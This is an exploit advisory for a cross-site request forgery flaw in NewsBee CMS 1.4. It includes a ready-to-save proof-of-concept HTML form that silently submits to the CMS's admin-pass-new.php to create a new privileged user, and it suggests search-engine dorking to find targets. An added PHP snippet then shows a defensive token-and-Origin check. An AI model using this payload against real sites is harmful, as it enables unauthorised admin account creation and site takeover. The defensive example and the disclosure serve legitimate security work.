NewsBee CMS version 1.4 suffers from a cross site request forgery vulnerability.
====================================================================================================================================
| # Title : NewsBee CMS 1.4 CSRF Vulnerability |
| # Author : indoushka |
| # Telegram : @indoushka |
| # Tested on : windows 10 Français V.(Pro) |
| # Vendor : https://codecanyon.net/item/newsbee-fully-featured-news-cms-with-bootstrasp-php-mysql/19404937 |
| # Dork : N/A |
====================================================================================================================================
poc :
[+] Dorking in Google or other search engine .
[+] save as poc.html .
<div class="full-height-scroll">
<div class="table-responsive" style="float:left;">
<div>
<form action="http://codecanyon.nelliwinne.net/NewsBee/admin/admin-pass-new.php?" id="form1" name="form1" method="POST" onsubmit="document.getElementById('loading').innerHTML='Loading...';" style="width:400px;">
<label>Username</label>
<input name="un" required="" class="form-control" id="un" autocomplete="off" value="" type="text">
<label>Password</label>
<input name="pw" required="" class="form-control" id="pw" value="" type="password">
<label>Permissions</label>
<table class="table table-striped table-bordered table-hover " width="300">
<tbody><tr>
<td bgcolor="#CCCCCC"> </td>
<td width="60" bgcolor="#CCCCCC"><strong>Tab Permission</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Comment Moderate</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>New</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Edit</strong></td>
<td width="60" bgcolor="#CCCCCC"><strong>Delete</strong></td>
</tr>
<tr>
<td bgcolor="#CCCCCC">News</td>
<td valign="middle" align="center"><input name="news" class="form-control form-inline" id="news" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_moderation" id="news_moderation" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_new" id="news_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_edit" id="news_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="news_delete" id="news_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Videos</strong></td>
<td valign="middle" align="center"><input name="videos" class="form-control form-inline" id="videos" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="videos_new" id="videos_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_edit" id="videos_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="videos_delete" id="videos_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Gallery</strong></td>
<td valign="middle" align="center"><input name="gallery" class="form-control form-inline" id="gallery" value="Y" checked="CHECKED" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="gallery_new" id="gallery_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_edit" id="gallery_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="gallery_delete" id="gallery_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Ads</strong></td>
<td valign="middle" align="center"><input name="ads" id="ads" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="ads_new" id="ads_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_edit" id="ads_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="ads_delete" id="ads_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Home Slider</strong></td>
<td valign="middle" align="center"><input name="slider" id="slider" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="slider_new" id="slider_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_edit" id="slider_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="slider_delete" id="slider_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>FAQ</strong></td>
<td valign="middle" align="center"><input name="faq" id="faq" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="faq_new" id="faq_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_edit" id="faq_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="faq_delete" id="faq_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Categories</strong></td>
<td valign="middle" align="center"><input name="categories" id="categories" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="categories_new" id="categories_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_edit" id="categories_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="categories_delete" id="categories_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
<tr>
<td bgcolor="#CCCCCC"><strong>Pages</strong></td>
<td valign="middle" align="center"><input name="pages" id="pages" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center">x</td>
<td valign="middle" align="center"><input name="pages_new" id="pages_new" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_edit" id="pages_edit" value="Y" class="form-control form-inline" type="checkbox"></td>
<td valign="middle" align="center"><input name="pages_delete" id="pages_delete" value="Y" class="form-control form-inline" type="checkbox"></td>
</tr>
</tbody></table>
<input name="Submit" id="button" value="Create User" class="btn btn-primary form-control" type="submit">
<input name="MM_insert" value="form1" type="hidden">
<input name="MM_update" value="form1" type="hidden">
</form>
<br>
</div>
</div>
</div>
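The form above carries only static hidden fields (`MM_insert`, `MM_update`), so nothing in the request distinguishes a cross-site submission from one made on the admin page itself. A per-session token check with an Origin comparison that rejects such a request, as an added example (not NewsBee's or the advisory author's code; the function names, the `csrf_token` field and the `https://cms.example` origin are assumptions):

```php
<?php
declare(strict_types=1);

// Added example, not NewsBee code. csrf_token(), csrf_check(), the "csrf_token"
// field name and the origin https://cms.example are hypothetical.

/** Create (once per session) the random token the admin form embeds as a hidden field. */
function csrf_token(array &$session): string
{
    if (empty($session['csrf_token'])) {
        $session['csrf_token'] = bin2hex(random_bytes(32));
    }
    return $session['csrf_token'];
}

/** True only for a POST from the expected origin that carries the session's token. */
function csrf_check(array $server, array $post, array $session, string $allowedOrigin): bool
{
    if (($server['REQUEST_METHOD'] ?? '') !== 'POST') {
        return false;
    }
    // When the browser sends an Origin header, it must match the site's own origin.
    $origin = $server['HTTP_ORIGIN'] ?? null;
    if ($origin !== null && $origin !== $allowedOrigin) {
        return false;
    }
    $expected = $session['csrf_token'] ?? '';
    $supplied = $post['csrf_token'] ?? '';
    if (!is_string($expected) || !is_string($supplied) || $expected === '') {
        return false;
    }
    return hash_equals($expected, $supplied); // constant-time comparison
}

// Constructed requests: $_SESSION, $_SERVER and $_POST are modelled as plain arrays.
$session = [];
$token   = csrf_token($session);
$fields  = ['un' => 'editor', 'pw' => 'constructed-value', 'MM_insert' => 'form1'];

// Cross-site submission shaped like the form above: static fields only, no token.
$forged = csrf_check(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://other.example'],
    $fields, $session, 'https://cms.example');
// Same-origin submission from the real admin page, which embedded the token.
$genuine = csrf_check(['REQUEST_METHOD' => 'POST', 'HTTP_ORIGIN' => 'https://cms.example'],
    $fields + ['csrf_token' => $token], $session, 'https://cms.example');

var_dump($forged, $genuine);
```

In a real handler the three arrays would be `$_SERVER`, `$_POST` and `$_SESSION` after `session_start()`, with a 403 response and early exit when the check returns false.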
Greetings to :=========================================================================================================================
|
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |
|
=======================================================================================================================================